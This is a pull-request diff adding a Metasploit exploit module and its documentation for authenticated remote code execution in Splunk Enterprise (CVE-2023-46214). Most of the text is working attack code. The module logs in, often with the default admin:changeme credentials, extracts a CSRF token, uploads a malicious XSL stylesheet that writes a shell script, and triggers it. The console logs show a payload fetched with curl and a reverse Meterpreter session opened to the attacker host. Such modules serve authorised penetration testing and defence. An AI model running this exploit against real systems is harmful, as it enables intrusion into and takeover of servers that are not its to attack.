### PR TITLE
Added RCE Module for Splunk Enterprise (CVE-2023-46214)

### DIFF
--- a/documentation/modules/exploit/unix/http/splunk_xslt_authenticated_rce.md
+++ b/documentation/modules/exploit/unix/http/splunk_xslt_authenticated_rce.md
@@ -41,7 +41,7 @@ Payload options (cmd/linux/http/x64/meterpreter/reverse_tcp):
    ----                ---------------  --------  -----------
    FETCH_COMMAND       CURL             yes       Command to fetch payload (Accepted: CURL, FTP, TFTP, TNFTP, WGET)
    FETCH_DELETE        false            yes       Attempt to delete the binary after execution
-   FETCH_FILENAME      KcOBAvuTm        no        Name to use on remote system when storing payload; cannot contain spaces.
+   FETCH_FILENAME      IOTkAvNNbkS      no        Name to use on remote system when storing payload; cannot contain spaces.
    FETCH_SRVHOST                        no        Local IP to use for serving payload
    FETCH_SRVPORT       8080             yes       Local port to use for serving payload
    FETCH_URIPATH                        no        Local URI to use for serving payload
@@ -62,23 +62,23 @@ View the full module info with the info, or info -d command.
 
 msf6 exploit(unix/http/splunk_xslt_authenticated_rce) > set rhosts chocapikk.lab
 rhosts => chocapikk.lab
-msf6 exploit(unix/http/splunk_xslt_authenticated_rce) > set AutoCheck false
-AutoCheck => false
 msf6 exploit(unix/http/splunk_xslt_authenticated_rce) > exploit
 
 [*] Started reverse TCP handler on 192.168.1.5:4444 
-[!] AutoCheck is disabled, proceeding with exploitation
+[*] Running automatic check ("set AutoCheck false" to disable)
+[+] Successfully authenticated on the Splunk instance
+[+] The target appears to be vulnerable. Exploitable version found: 9.1.1
 [+] Successfully authenticated on the Splunk instance
 [*] Extracting CSRF token from cookies
-[+] CSRF token successfully extracted: 6022199423440420518
+[+] CSRF token successfully extracted: 14569371447995353491
 [+] Malicious file uploaded successfully
 [*] Sending job search request to /en-US/splunkd/__raw/servicesNS/admin/search/search/jobs?output_mode=json
-[*] Triggering XSLT transformation at /en-US/api/search/jobs/1701181058.135/results?xsl=/opt/splunk/var/run/splunk/dispatch/1701181058.134/shell.xsl
+[*] Triggering XSLT transformation at /en-US/api/search/jobs/1701186108.149/results?xsl=/opt/splunk/var/run/splunk/dispatch/1701186108.148/shell.xsl
 [+] XSLT transformation triggered successfully
 [*] Executing reverse shell command at /en-US/splunkd/__raw/servicesNS/admin/search/search/jobs
 [+] Reverse shell command executed successfully
 [*] Sending stage (3045380 bytes) to 172.17.0.2
-[*] Meterpreter session 1 opened (192.168.1.5:4444 -> 172.17.0.2:39376) at 2023-11-28 15:17:38 +0100
+[*] Meterpreter session 1 opened (192.168.1.5:4444 -> 172.17.0.2:39296) at 2023-11-28 16:41:49 +0100
 
 meterpreter > sysinfo
 Computer     : 172.17.0.2

--- a/documentation/modules/exploit/unix/http/splunk_xslt_authenticated_rce.md
+++ b/documentation/modules/exploit/unix/http/splunk_xslt_authenticated_rce.md
@@ -1,0 +1,104 @@
+## Vulnerable Application
+
+This Metasploit module exploits a Remote Code Execution (RCE) vulnerability in Splunk Enterprise.
+The vulnerability affects versions 9.0.x prior to 9.0.7 and 9.1.x before 9.1.2.
+The exploit takes advantage of a flaw in the XSLT transformation functionality of Splunk Enterprise
+and requires valid credentials to be executed successfully, with the default credentials often being admin:changeme.
+
+## Verification Steps
+1. **Start Metasploit**: Launch `msfconsole` in your Metasploit framework.
+2. **Select the Module**: Use the module with the command `use exploit/unix/http/splunk_xslt_authenticated_rce`.
+3. **Disable AutoCheck**: Optionally, you can disable the automatic vulnerability check with `set AutoCheck false`.
+4. **Set RHOSTS**: Define the target host (e.g., `set rhosts [target_ip_or_hostname]`).
+5. **Set Credentials**: Provide valid Splunk credentials (username and password).
+6. **Execute the Exploit**: Use the `exploit` command to run the exploit.
+
+## Options
+- **USERNAME**: The username for authentication.
+- **PASSWORD**: The password for authentication.
+
+## Scenarios
+```
+[*] No payload configured, defaulting to cmd/linux/http/x64/meterpreter/reverse_tcp
+msf6 exploit(unix/http/splunk_xslt_authenticated_rce) > options
+
+Module options (exploit/unix/http/splunk_xslt_authenticated_rce):
+
+   Name      Current Setting  Required  Description
+   ----      ---------------  --------  -----------
+   PASSWORD  changeme         yes       Password for Splunk
+   Proxies                    no        A proxy chain of format type:host:port[,type:host:port][...]
+   RHOSTS                     yes       The target host(s), see https://docs.metasploit.com/docs/using-metasploit/basics/using-metasploit.html
+   RPORT     8000             yes       The target port (TCP)
+   SSL       false            no        Negotiate SSL/TLS for outgoing connections
+   USERNAME  admin            yes       Username for Splunk
+   VHOST                      no        HTTP server virtual host
+
+
+Payload options (cmd/linux/http/x64/meterpreter/reverse_tcp):
+
+   Name                Current Setting  Required  Description
+   ----                ---------------  --------  -----------
+   FETCH_COMMAND       CURL             yes       Command to fetch payload (Accepted: CURL, FTP, TFTP, TNFTP, WGET)
+   FETCH_DELETE        false            yes       Attempt to delete the binary after execution
+   FETCH_FILENAME      KcOBAvuTm        no        Name to use on remote system when storing payload; cannot contain spaces.
+   FETCH_SRVHOST                        no        Local IP to use for serving payload
+   FETCH_SRVPORT       8080             yes       Local port to use for serving payload
+   FETCH_URIPATH                        no        Local URI to use for serving payload
+   FETCH_WRITABLE_DIR                   yes       Remote writable dir to store payload; cannot contain spaces.
+   LHOST               192.168.1.5      yes       The listen address (an interface may be specified)
+   LPORT               4444             yes       The listen port
+
+
+Exploit target:
+
+   Id  Name
+   --  ----
+   0   Automatic
+
+
+
+View the full module info with the info, or info -d command.
+
+msf6 exploit(unix/http/splunk_xslt_authenticated_rce) > set rhosts chocapikk.lab
+rhosts => chocapikk.lab
+msf6 exploit(unix/http/splunk_xslt_authenticated_rce) > set AutoCheck false
+AutoCheck => false
+msf6 exploit(unix/http/splunk_xslt_authenticated_rce) > exploit
+
+[*] Started reverse TCP handler on 192.168.1.5:4444 
+[!] AutoCheck is disabled, proceeding with exploitation
+[+] Successfully authenticated on the Splunk instance
+[*] Extracting CSRF token from cookies
+[+] CSRF token successfully extracted: 6022199423440420518
+[+] Malicious file uploaded successfully
+[*] Sending job search request to /en-US/splunkd/__raw/servicesNS/admin/search/search/jobs?output_mode=json
+[*] Triggering XSLT transformation at /en-US/api/search/jobs/1701181058.135/results?xsl=/opt/splunk/var/run/splunk/dispatch/1701181058.134/shell.xsl
+[+] XSLT transformation triggered successfully
+[*] Executing reverse shell command at /en-US/splunkd/__raw/servicesNS/admin/search/search/jobs
+[+] Reverse shell command executed successfully
+[*] Sending stage (3045380 bytes) to 172.17.0.2
+[*] Meterpreter session 1 opened (192.168.1.5:4444 -> 172.17.0.2:39376) at 2023-11-28 15:17:38 +0100
+
+meterpreter > sysinfo
+Computer     : 172.17.0.2
+OS           : Red Hat Enterprise Linux 8 (Linux 6.4.10-060410-generic)
+Architecture : x64
+BuildTuple   : x86_64-linux-musl
+Meterpreter  : x64/linux
+meterpreter > 
+```
+
+### Exploitation Process
+1. **Authentication**: The module authenticates using provided credentials.
+2. **CSRF Token Extraction**: Extracts a CSRF token from the Splunk server for subsequent requests.
+3. **Malicious File Upload**: Uploads a malicious XSL file to the server.
+4. **Triggering XSLT Transformation**: Initiates an XSLT transformation to execute the payload.
+5. **Executing Payload**: Executes the payload, resulting in a reverse shell or similar access.
+
+### Expected Results
+Upon successful exploitation, the attacker gains remote code execution capabilities on the target Splunk server,
+usually as the user running the Splunk service.
+
+### Important Notes
+- This exploit requires valid credentials for successful execution.

--- a/documentation/modules/exploit/unix/http/splunk_xslt_authenticated_rce.md
+++ b/documentation/modules/exploit/unix/http/splunk_xslt_authenticated_rce.md
@@ -5,17 +5,15 @@ The vulnerability affects versions 9.0.x prior to 9.0.7 and 9.1.x before 9.1.2.
 The exploit takes advantage of a flaw in the XSLT transformation functionality of Splunk Enterprise
 and requires valid credentials to be executed successfully, with the default credentials often being admin:changeme.
 
+Upon successful exploitation, the attacker is able to execute code with the same privileges as the Splunk service user.
+Typically, this user is 'splunk' and the resulting shell will have permissions associated with this user account,
+which may vary depending on the specific environment and configuration of the Splunk service.
+
 ## Verification Steps
 1. **Start Metasploit**: Launch `msfconsole` in your Metasploit framework.
 2. **Select the Module**: Use the module with the command `use exploit/unix/http/splunk_xslt_authenticated_rce`.
 3. **Disable AutoCheck**: Optionally, you can disable the automatic vulnerability check with `set AutoCheck false`.
-4. **Set RHOSTS**: Define the target host (e.g., `set rhosts [target_ip_or_hostname]`).
-5. **Set Credentials**: Provide valid Splunk credentials (username and password).
-6. **Execute the Exploit**: Use the `exploit` command to run the exploit.
-
-## Options
-- **USERNAME**: The username for authentication.
-- **PASSWORD**: The password for authentication.
+4. **Execute the Exploit**: Use the `exploit` command to run the exploit.
 
 ## Scenarios
 ```
@@ -24,15 +22,17 @@ msf6 exploit(unix/http/splunk_xslt_authenticated_rce) > options
 
 Module options (exploit/unix/http/splunk_xslt_authenticated_rce):
 
-   Name      Current Setting  Required  Description
-   ----      ---------------  --------  -----------
-   PASSWORD  changeme         yes       Password for Splunk
-   Proxies                    no        A proxy chain of format type:host:port[,type:host:port][...]
-   RHOSTS                     yes       The target host(s), see https://docs.metasploit.com/docs/using-metasploit/basics/using-metasploit.html
-   RPORT     8000             yes       The target port (TCP)
-   SSL       false            no        Negotiate SSL/TLS for outgoing connections
-   USERNAME  admin            yes       Username for Splunk
-   VHOST                      no        HTTP server virtual host
+   Name             Current Setting  Required  Description
+   ----             ---------------  --------  -----------
+   PASSWORD         changeme         yes       Password for Splunk
+   Proxies                           no        A proxy chain of format type:host:port[,type:host:port][...]
+   RANDOM_FILENAME  gWQgBqnz         no        Random filename with 8 characters
+   RHOSTS                            yes       The target host(s), see https://docs.metasploit.com/docs/using-metasploit/basics/using-metasp
+                                               loit.html
+   RPORT            8000             yes       The target port (TCP)
+   SSL              false            no        Negotiate SSL/TLS for outgoing connections
+   USERNAME         admin            yes       Username for Splunk
+   VHOST                             no        HTTP server virtual host
 
 
 Payload options (cmd/linux/http/x64/meterpreter/reverse_tcp):
@@ -41,7 +41,7 @@ Payload options (cmd/linux/http/x64/meterpreter/reverse_tcp):
    ----                ---------------  --------  -----------
    FETCH_COMMAND       CURL             yes       Command to fetch payload (Accepted: CURL, FTP, TFTP, TNFTP, WGET)
    FETCH_DELETE        false            yes       Attempt to delete the binary after execution
-   FETCH_FILENAME      IOTkAvNNbkS      no        Name to use on remote system when storing payload; cannot contain spaces.
+   FETCH_FILENAME      eXHMuZOtzdPG     no        Name to use on remote system when storing payload; cannot contain spaces.
    FETCH_SRVHOST                        no        Local IP to use for serving payload
    FETCH_SRVPORT       8080             yes       Local port to use for serving payload
    FETCH_URIPATH                        no        Local URI to use for serving payload
@@ -70,15 +70,15 @@ msf6 exploit(unix/http/splunk_xslt_authenticated_rce) > exploit
 [+] The target appears to be vulnerable. Exploitable version found: 9.1.1
 [+] Successfully authenticated on the Splunk instance
 [*] Extracting CSRF token from cookies
-[+] CSRF token successfully extracted: 14569371447995353491
+[+] CSRF token successfully extracted: 4066849599386392852
 [+] Malicious file uploaded successfully
-[*] Sending job search request to /en-US/splunkd/__raw/servicesNS/admin/search/search/jobs?output_mode=json
-[*] Triggering XSLT transformation at /en-US/api/search/jobs/1701186108.149/results?xsl=/opt/splunk/var/run/splunk/dispatch/1701186108.148/shell.xsl
+[*] Sending job search request to /en-US/splunkd/__raw/servicesNS/admin/search/search/jobs
+[*] Triggering XSLT transformation at /en-US/api/search/jobs/1701424044.745/results?xsl=/opt/splunk/var/run/splunk/dispatch/1701424043.744/gWQgBqnz.xsl
 [+] XSLT transformation triggered successfully
-[*] Executing reverse shell command at /en-US/splunkd/__raw/servicesNS/admin/search/search/jobs
-[+] Reverse shell command executed successfully
+[*] Executing payload at /en-US/splunkd/__raw/servicesNS/admin/search/search/jobs
+[+] Payload executed successfully
 [*] Sending stage (3045380 bytes) to 172.17.0.2
-[*] Meterpreter session 1 opened (192.168.1.5:4444 -> 172.17.0.2:39296) at 2023-11-28 16:41:49 +0100
+[*] Meterpreter session 1 opened (192.168.1.5:4444 -> 172.17.0.2:60690) at 2023-12-01 10:47:25 +0100
 
 meterpreter > sysinfo
 Computer     : 172.17.0.2
@@ -86,7 +86,7 @@ OS           : Red Hat Enterprise Linux 8 (Linux 6.4.10-060410-generic)
 Architecture : x64
 BuildTuple   : x86_64-linux-musl
 Meterpreter  : x64/linux
-meterpreter > 
+meterpreter >
 ```
 
 ### Exploitation Process
@@ -96,9 +96,14 @@ meterpreter >
 4. **Triggering XSLT Transformation**: Initiates an XSLT transformation to execute the payload.
 5. **Executing Payload**: Executes the payload, resulting in a reverse shell or similar access.
 
-### Expected Results
-Upon successful exploitation, the attacker gains remote code execution capabilities on the target Splunk server,
-usually as the user running the Splunk service.
+### Creating a Vulnerable Splunk
 
-### Important Notes
+```
+docker run -p 8000:8000 -e "SPLUNK_PASSWORD=Password^" -e "SPLUNK_START_ARGS=--accept-license" -it splunk/splunk:9.1.1
+```
+To create a vulnerable user, login with admin, then browse:
+settings > users > New User
+    Create a new user with the 'user' and 'splunk-system-role' role
+
+### Expected Results
 - This exploit requires valid credentials for successful execution.

--- a/modules/exploits/unix/http/splunk_xslt_authenticated_rce.rb
+++ b/modules/exploits/unix/http/splunk_xslt_authenticated_rce.rb
@@ -27,8 +27,8 @@ class MetasploitModule < Msf::Exploit::Remote
         'References' => [
           ['CVE', '2023-46214'],
           ['URL', 'https://github.com/nathan31337/Splunk-RCE-poc'],
-          [ 'URL', 'https://advisory.splunk.com/advisories/SVD-2023-1104' ], # Vendor Advisory
-          [ 'URL', 'https://blog.hrncirik.net/cve-2023-46214-analysis' ], # Writeup
+          ['URL', 'https://advisory.splunk.com/advisories/SVD-2023-1104'], # Vendor Advisory
+          ['URL', 'https://blog.hrncirik.net/cve-2023-46214-analysis'], # Writeup
         ],
         'Platform' => ['unix', 'linux'],
         'Arch' => [ARCH_PHP, ARCH_CMD],

--- a/modules/exploits/unix/http/splunk_xslt_authenticated_rce.rb
+++ b/modules/exploits/unix/http/splunk_xslt_authenticated_rce.rb
@@ -66,7 +66,7 @@ class MetasploitModule < Msf::Exploit::Remote
   end
 
   def exploit
-    cookie_string = authenticate
+    cookie_string = authenticate unless cookie_string
     unless cookie_string
       fail_with(Failure::NoAccess, 'Authentication failed')
     end

--- a/modules/exploits/unix/http/splunk_xslt_authenticated_rce.rb
+++ b/modules/exploits/unix/http/splunk_xslt_authenticated_rce.rb
@@ -87,8 +87,25 @@ class MetasploitModule < Msf::Exploit::Remote
   end
 
   def check
-    print_status('Version check is not implemented. Assuming the target is vulnerable.')
-    CheckCode::Appears
+    unless splunk?
+      return CheckCode::Unknown('Target does not appear to be a Splunk instance')
+    end
+
+    auth_result, cookie_string = authenticate
+    unless auth_result
+      fail_with(Failure::NoAccess, 'Authentication failed')
+      return
+    end
+
+    version = get_version_authenticated(cookie_string)
+    return CheckCode::Unknown('Unable to determine Splunk version') unless version
+
+    if version.between?(Rex::Version.new('9.0.0'), Rex::Version.new('9.0.6')) ||
+       version.between?(Rex::Version.new('9.1.0'), Rex::Version.new('9.1.1'))
+      return CheckCode::Appears("Exploitable version found: #{version}")
+    end
+
+    CheckCode::Safe("Non-vulnerable version found: #{version}")
   end
 
   def trigger_reverse_shell(jsid, csrf_token, cookie_string)
@@ -305,6 +322,33 @@ class MetasploitModule < Msf::Exploit::Remote
       fail_with(Failure::NotFound, 'CSRF token not found in cookies')
       return [nil, nil]
     end
+  end
+
+  def get_version_authenticated(cookie_string)
+    res = send_request_cgi({
+      'uri' => normalize_uri(target_uri.path, '/en-US/splunkd/__raw/services/authentication/users/', datastore['USERNAME']),
+      'vars_get' => {
+        'output_mode' => 'json'
+      },
+      'headers' => {
+        'Cookie' => cookie_string
+      }
+    })
+
+    return nil unless res&.code == 200
+
+    body = res.get_json_document
+    Rex::Version.new(body.dig('generator', 'version'))
+  end
+
+  def splunk?
+    res = send_request_cgi({
+      'uri' => normalize_uri(target_uri.path, '/en-US/account/login')
+    }, 25)
+
+    return true if res&.body =~ /Splunk/
+
+    false
   end
 
   def authenticate

--- a/modules/exploits/unix/http/splunk_xslt_authenticated_rce.rb
+++ b/modules/exploits/unix/http/splunk_xslt_authenticated_rce.rb
@@ -100,7 +100,6 @@ class MetasploitModule < Msf::Exploit::Remote
     }
 
     upload_headers = {
-      'User-Agent' => 'Axer Framework',
       'X-Requested-With' => 'XMLHttpRequest',
       'X-Splunk-Form-Key' => csrf_token,
       'Cookie' => cookie_string

--- a/modules/exploits/unix/http/splunk_xslt_authenticated_rce.rb
+++ b/modules/exploits/unix/http/splunk_xslt_authenticated_rce.rb
@@ -66,7 +66,7 @@ class MetasploitModule < Msf::Exploit::Remote
   end
 
   def exploit
-    cookie_string = authenticate unless cookie_string
+    cookie_string ||= authenticate
     unless cookie_string
       fail_with(Failure::NoAccess, 'Authentication failed')
     end
@@ -111,6 +111,7 @@ class MetasploitModule < Msf::Exploit::Remote
     rescue RuntimeError
       cookie_string = nil
     end
+
     unless cookie_string
       return CheckCode::Detected('The target is Splunk but authentication failed')
     end

--- a/modules/exploits/unix/http/splunk_xslt_authenticated_rce.rb
+++ b/modules/exploits/unix/http/splunk_xslt_authenticated_rce.rb
@@ -45,6 +45,7 @@ class MetasploitModule < Msf::Exploit::Remote
         'DefaultTarget' => 0,
         'DefaultOptions' => {
           'RPORT' => 8000
+
         },
         'Privileged' => false,
         'Notes' => {
@@ -59,34 +60,33 @@ class MetasploitModule < Msf::Exploit::Remote
       [
         OptString.new('USERNAME', [true, 'Username for Splunk', 'admin']),
         OptString.new('PASSWORD', [true, 'Password for Splunk', 'changeme']),
+        OptString.new('RANDOM_FILENAME', [false, 'Random filename with 8 characters', Rex::Text.rand_text_alpha(8)]),
       ]
     )
   end
 
   def exploit
-    auth_result, cookie_string = authenticate
-    unless auth_result
+    cookie_string = authenticate
+    unless cookie_string
       fail_with(Failure::NoAccess, 'Authentication failed')
-      return
     end
 
     sleep(0.3)
     csrf_token, updated_cookie_string = fetch_csrf_token(cookie_string)
     unless csrf_token
       fail_with(Failure::NoAccess, 'Failed to obtain CSRF token')
-      return
     end
 
     sleep(0.3)
     malicious_xsl = generate_malicious_xsl
-    uploaded, text_value = upload_malicious_file(malicious_xsl, csrf_token, updated_cookie_string)
-    unless uploaded
+    text_value = upload_malicious_file(malicious_xsl, csrf_token, updated_cookie_string)
+    unless text_value
       fail_with(Failure::Unknown, 'File upload failed')
     end
 
     sleep(0.3)
-    jsid_created, jsid = get_job_search_id(csrf_token, updated_cookie_string)
-    unless jsid_created
+    jsid = get_job_search_id(csrf_token, updated_cookie_string)
+    unless jsid
       fail_with(Failure::Unknown, 'Creating job failed')
     end
 
@@ -96,7 +96,7 @@ class MetasploitModule < Msf::Exploit::Remote
     end
 
     sleep(0.3)
-    unless trigger_reverse_shell(jsid, csrf_token, updated_cookie_string)
+    unless trigger_payload(jsid, csrf_token, updated_cookie_string)
       fail_with(Failure::Unknown, 'Failed to execute reverse shell')
     end
   end
@@ -106,14 +106,13 @@ class MetasploitModule < Msf::Exploit::Remote
       return CheckCode::Unknown('Target does not appear to be a Splunk instance')
     end
 
-    auth_result, cookie_string = authenticate
-    unless auth_result
-      fail_with(Failure::NoAccess, 'Authentication failed')
-      return
+    cookie_string = authenticate
+    unless cookie_string
+      return CheckCode::Detected('The target is Splunk but authentication failed')
     end
 
     version = get_version_authenticated(cookie_string)
-    return CheckCode::Unknown('Unable to determine Splunk version') unless version
+    return CheckCode::Detected('Unable to determine Splunk version') unless version
 
     if version.between?(Rex::Version.new('9.0.0'), Rex::Version.new('9.0.6')) ||
        version.between?(Rex::Version.new('9.1.0'), Rex::Version.new('9.1.1'))
@@ -123,12 +122,12 @@ class MetasploitModule < Msf::Exploit::Remote
     CheckCode::Safe("Non-vulnerable version found: #{version}")
   end
 
-  def trigger_reverse_shell(jsid, csrf_token, cookie_string)
-    return false unless jsid && csrf_token
+  def trigger_payload(jsid, csrf_token, cookie_string)
+    return nil unless jsid && csrf_token
 
     runshellscript_url = normalize_uri(target_uri.path, 'en-US', 'splunkd', '__raw', 'servicesNS', datastore['USERNAME'], 'search', 'search', 'jobs')
     runshellscript_data = {
-      'search' => "|runshellscript \"shell.sh\" \"\" \"\" \"\" \"\" \"\" \"\" \"\" \"#{jsid}\""
+      'search' => "|runshellscript \"#{datastore['RANDOM_FILENAME']}.sh\" \"\" \"\" \"\" \"\" \"\" \"\" \"\" \"#{jsid}\""
     }
 
     upload_headers = {
@@ -137,7 +136,7 @@ class MetasploitModule < Msf::Exploit::Remote
       'Cookie' => cookie_string
     }
 
-    print_status("Executing reverse shell command at #{runshellscript_url}")
+    print_status("Executing payload at #{runshellscript_url}")
     res = send_request_cgi(
       'uri' => runshellscript_url,
       'method' => 'POST',
@@ -146,23 +145,24 @@ class MetasploitModule < Msf::Exploit::Remote
     )
 
     unless res
-      print_error('Failed to execute reverse shell: No response received')
-      return false
+      print_error('Failed to execute payload: No response received')
+      return nil
     end
 
     if res.code == 201
-      print_good('Reverse shell command executed successfully')
+      print_good('Payload executed successfully')
       return true
     end
-    print_error("Failed to execute reverse shell: Server returned status code #{res.code}")
-    false
+
+    print_error("Failed to execute payload: Server returned status code #{res.code}")
+    return nil
   end
 
   def trigger_xslt_transform(jsid, text_value, cookie_string)
-    return false unless jsid && text_value
+    return nil unless jsid && text_value
 
     exploit_endpoint = normalize_uri(target_uri.path, 'en-US', 'api', 'search', 'jobs', jsid, 'results')
-    exploit_endpoint << "?xsl=/opt/splunk/var/run/splunk/dispatch/#{text_value}/shell.xsl"
+    exploit_endpoint << "?xsl=/opt/splunk/var/run/splunk/dispatch/#{text_value}/#{datastore['RANDOM_FILENAME']}.xsl"
 
     xslt_headers = {
       'X-Splunk-Module' => 'Splunk.Module.DispatchingModule',
@@ -183,15 +183,16 @@ class MetasploitModule < Msf::Exploit::Remote
 
     unless res
       print_error('Failed to trigger XSLT transformation: No response received')
-      return false
+      return nil
     end
 
     if res.code == 200
       print_good('XSLT transformation triggered successfully')
       return true
     end
+
     print_error("Failed to trigger XSLT transformation: Server returned status code #{res.code}")
-    false
+    return nil
   end
 
   def generate_malicious_xsl
@@ -201,7 +202,7 @@ class MetasploitModule < Msf::Exploit::Remote
       <?xml version="1.0" encoding="UTF-8"?>
       <xsl:stylesheet version="1.0" xmlns:xsl="http://www.w3.org/1999/XSL/Transform" xmlns:exsl="http://exslt.org/common" extension-element-prefixes="exsl">
         <xsl:template match="/">
-          <exsl:document href="/opt/splunk/bin/scripts/shell.sh" method="text">
+          <exsl:document href="/opt/splunk/bin/scripts/#{datastore['RANDOM_FILENAME']}.sh" method="text">
             <xsl:text>#{encoded_payload}</xsl:text>
           </exsl:document>
         </xsl:template>
@@ -212,7 +213,7 @@ class MetasploitModule < Msf::Exploit::Remote
   end
 
   def get_job_search_id(csrf_token, cookie_string)
-    return false, nil unless csrf_token
+    return nil unless csrf_token
 
     jsid_url = normalize_uri(target_uri.path, 'en-US', 'splunkd', '__raw', 'servicesNS', datastore['USERNAME'], 'search', 'search', 'jobs')
 
@@ -237,21 +238,21 @@ class MetasploitModule < Msf::Exploit::Remote
 
     unless res
       print_error('Failed to initiate job search: No response received')
-      return false, nil
+      return nil
     end
 
-    jsid = JSON.parse(res.body)['sid']
-    return true, jsid if jsid
+    jsid = res.get_json_document['sid']
+    return jsid if jsid
   end
 
   def upload_malicious_file(file_content, csrf_token, cookie_string)
     unless csrf_token
       print_error('CSRF token not found')
-      return false, nil
+      return nil
     end
 
     post_data = Rex::MIME::Message.new
-    post_data.add_part(file_content, 'application/xslt+xml', nil, 'form-data; name="spl-file"; filename="shell.xsl"')
+    post_data.add_part(file_content, 'application/xslt+xml', nil, "form-data; name=\"spl-file\"; filename=\"#{datastore['RANDOM_FILENAME']}.xsl\"")
 
     upload_headers = {
       'Accept' => 'text/javascript, text/html, application/xml, text/xml, */*',
@@ -271,44 +272,40 @@ class MetasploitModule < Msf::Exploit::Remote
       'vars_get' => {
         'output_mode' => 'json',
         'props.NO_BINARY_CHECK' => 1,
-        'input.path' => 'shell.xsl'
+        'input.path' => "#{datastore['RANDOM_FILENAME']}.xsl"
       }
     )
 
     unless res
       print_error('Malicious file upload failed: No response received')
-      return false, nil
+      return nil
     end
 
-    response_body = res.body
-    if response_body.nil? || response_body.empty?
-      print_error('Response body is empty')
-      return false, nil
-    end
-
-    response_data = nil
-    is_json = response_body.strip.start_with?('{') && response_body.strip.end_with?('}')
-
-    if is_json
-      response_data = JSON.parse(response_body)
+    if res.headers['Content-Type'].include?('application/json')
+      response_data = res.get_json_document
     else
       print_error('Response is not in JSON format')
-      return false, nil
+      return nil
     end
 
-    if response_data && response_data['messages'] && !response_data['messages'].empty?
+    if response_data.empty?
+      print_error('Failed to parse JSON or received empty JSON')
+      return nil
+    end
+
+    if response_data['messages'] && !response_data['messages'].empty?
       text_value = response_data.dig('messages', 0, 'text')
       if text_value.include?('concatenate')
         print_error('Server responded with an error: concatenate found in the response')
-        return false, nil
+        return nil
       end
 
       print_good('Malicious file uploaded successfully')
-      return true, text_value
-    else
-      print_error('Server did not return a valid "messages" field')
-      return false, nil
+      return text_value
     end
+
+    print_error('Server did not return a valid "messages" field')
+    return nil
   end
 
   def fetch_csrf_token(cookie_string)
@@ -327,18 +324,17 @@ class MetasploitModule < Msf::Exploit::Remote
         'cookie' => cookie_string
       })
 
+      updated_cookie_string = cookie_string
+
       if res && res.code == 200
         new_cookies = res.get_cookies
-        updated_cookie_string = cookie_string + new_cookies
-      else
-        updated_cookie_string = cookie_string
+        updated_cookie_string += new_cookies
       end
 
       return [csrf_token, updated_cookie_string]
-    else
-      fail_with(Failure::NotFound, 'CSRF token not found in cookies')
-      return [nil, nil]
     end
+
+    fail_with(Failure::NotFound, 'CSRF token not found in cookies')
   end
 
   def get_version_authenticated(cookie_string)
@@ -361,7 +357,7 @@ class MetasploitModule < Msf::Exploit::Remote
   def splunk?
     res = send_request_cgi({
       'uri' => normalize_uri(target_uri.path, '/en-US/account/login')
-    }, 25)
+    })
 
     return true if res&.body =~ /Splunk/
 
@@ -378,14 +374,12 @@ class MetasploitModule < Msf::Exploit::Remote
 
     unless res
       fail_with(Failure::Unreachable, 'No response received for authentication request')
-      return [false, nil]
     end
 
     cval_value = res.get_cookies.match(/cval=([^;]*)/)[1]
 
     unless cval_value
       fail_with(Failure::UnexpectedReply, 'Failed to retrieve the cval cookie for authentication')
-      return [false, nil]
     end
 
     auth_payload = {
@@ -402,12 +396,11 @@ class MetasploitModule < Msf::Exploit::Remote
       'vars_post' => auth_payload
     })
 
-    if res && res.code == 200
-      print_good('Successfully authenticated on the Splunk instance')
-      return [true, res.get_cookies]
-    else
+    unless res && res.code == 200
       fail_with(Failure::NoAccess, 'Failed to authenticate on the Splunk instance')
-      return [false, nil]
     end
+
+    print_good('Successfully authenticated on the Splunk instance')
+    res.get_cookies
   end
 end

--- a/modules/exploits/unix/http/splunk_xslt_authenticated_rce.rb
+++ b/modules/exploits/unix/http/splunk_xslt_authenticated_rce.rb
@@ -106,7 +106,11 @@ class MetasploitModule < Msf::Exploit::Remote
       return CheckCode::Unknown('Target does not appear to be a Splunk instance')
     end
 
-    cookie_string = authenticate
+    begin
+      cookie_string = authenticate
+    rescue RuntimeError
+      cookie_string = nil
+    end
     unless cookie_string
       return CheckCode::Detected('The target is Splunk but authentication failed')
     end

--- a/modules/exploits/unix/http/splunk_xslt_authenticated_rce.rb
+++ b/modules/exploits/unix/http/splunk_xslt_authenticated_rce.rb
@@ -1,0 +1,353 @@
+##
+# This module requires Metasploit: https://metasploit.com/download
+# Current source: https://github.com/rapid7/metasploit-framework
+##
+
+class MetasploitModule < Msf::Exploit::Remote
+  Rank = NormalRanking
+
+  include Msf::Exploit::Remote::HttpClient
+  prepend Msf::Exploit::Remote::AutoCheck
+
+  def initialize(info = {})
+    super(
+      update_info(
+        info,
+        'Name' => '(Authenticated) RCE in Splunk (9.0.x to 9.0.7, 9.1.x to 9.1.2)',
+        'Description' => %q{
+          This exploit module targets a Remote Code Execution vulnerability in Splunk Enterprise.
+          Vulnerable versions include 9.0.x before 9.0.7 and 9.1.x before 9.1.2.
+          Successful exploitation requires valid credentials (default: admin:changeme).
+        },
+        'Author' => [
+          'Valentin Lobstein' # Metasploit module
+        ],
+        'License' => MSF_LICENSE,
+        'References' => [
+          ['CVE', '2023-46214'],
+          ['URL', 'https://github.com/nathan31337/Splunk-RCE-poc']
+        ],
+        'Platform' => ['unix', 'linux'],
+        'Arch' => [ARCH_PHP, ARCH_CMD],
+        'Targets' => [['Automatic', {}]],
+        'DisclosureDate' => '2023-11-28',
+        'DefaultTarget' => 0,
+        'DefaultOptions' => {
+          'RPORT' => 8000
+        },
+        'Privileged' => false,
+        'Notes' => {
+          'Stability' => [CRASH_SAFE],
+          'Reliability' => [REPEATABLE_SESSION],
+          'SideEffects' => [IOC_IN_LOGS]
+        }
+      )
+    )
+
+    register_options(
+      [
+        OptString.new('USERNAME', [true, 'Username for Splunk', 'admin']),
+        OptString.new('PASSWORD', [true, 'Password for Splunk', 'changeme']),
+      ]
+    )
+  end
+
+  def exploit
+    auth_result, cookie_string = authenticate
+    unless auth_result
+      fail_with(Failure::NoAccess, 'Authentication failed')
+      return
+    end
+
+    csrf_token, updated_cookie_string = fetch_csrf_token(cookie_string)
+    unless csrf_token
+      fail_with(Failure::NoAccess, 'Failed to obtain CSRF token')
+      return
+    end
+
+    malicious_xsl = generate_malicious_xsl
+
+    uploaded, text_value = upload_malicious_file(malicious_xsl, csrf_token, updated_cookie_string)
+    unless uploaded
+      fail_with(Failure::Unknown, 'File upload failed')
+    end
+
+    jsid_created, jsid = get_job_search_id(csrf_token, updated_cookie_string)
+    unless jsid_created
+      fail_with(Failure::Unknown, 'Creating job failed')
+    end
+
+    unless trigger_xslt_transform(jsid, text_value, updated_cookie_string)
